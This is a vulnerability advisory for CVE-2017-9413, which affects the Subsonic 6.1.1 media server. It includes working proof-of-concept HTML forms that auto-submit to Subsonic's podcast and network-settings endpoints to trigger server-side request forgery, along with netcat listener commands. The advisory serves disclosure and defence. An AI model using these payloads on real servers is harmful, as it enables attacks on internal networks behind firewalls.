117 lines
No EOL
3.2 KiB
Text
117 lines
No EOL
3.2 KiB
Text
[+] Credits: John Page a.k.a hyp3rlinx
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
Vendor:
|
|
================
|
|
www.subsonic.org
|
|
|
|
|
|
|
|
Product:
|
|
===============
|
|
subsonic v6.1.1
|
|
|
|
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
==================================
|
|
CSRF - Server Side Request Forgery
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2017-9413
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
|
|
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
|
|
bypass Firewall restriction on LAN.
|
|
|
|
e.g
|
|
|
|
nc.exe -llvp 1337
|
|
listening on [any] 1337 ...
|
|
|
|
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
|
|
GET / HTTP/1.1
|
|
Cache-Control: no-cache
|
|
Pragma: no-cache
|
|
User-Agent: Java/1.8.0_45
|
|
Host: 127.0.0.1:1337
|
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
|
Connection: keep-alive
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
nc.exe -llvp 1337
|
|
listening on [any] 1337 ...
|
|
|
|
|
|
1) Subscribe to Podcast CSRF Persistent SSRF
|
|
|
|
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
|
|
<input type="text" name="add" value="http://127.0.0.1:1337">
|
|
<input type="submit" value="OK">
|
|
<script>document.forms[0].submit()</script>
|
|
</form>
|
|
|
|
|
|
nc.exe -llvp 5555
|
|
listening on [any] 5555 ...
|
|
|
|
|
|
2) Interet Radio Settings CSRF Persistent SSRF
|
|
|
|
<form action="http://localhost:4040/networkSettings.view" method="post">
|
|
<input name="portForwardingEnabled" type="hidden" value="true"/>
|
|
<input type="hidden" name="_portForwardingEnabled" value="on"/>
|
|
<input name="urlRedirectionEnabled" type="hidden" value="true" />
|
|
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
|
|
<input name="urlRedirectType" type="radio" value="NORMAL"/>
|
|
<input name="urlRedirectFrom" type="radio" value="yourname"/>
|
|
<input name="urlRedirectType" type="radio" value="CUSTOM" checked="true" />
|
|
<input name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
|
|
<script>document.forms[0].submit()</script>
|
|
</form>
|
|
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
==================================
|
|
Vendor Notification: May 29, 2017
|
|
Vendor Acknowledgement: May 30, 2017
|
|
June 4, 2017 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |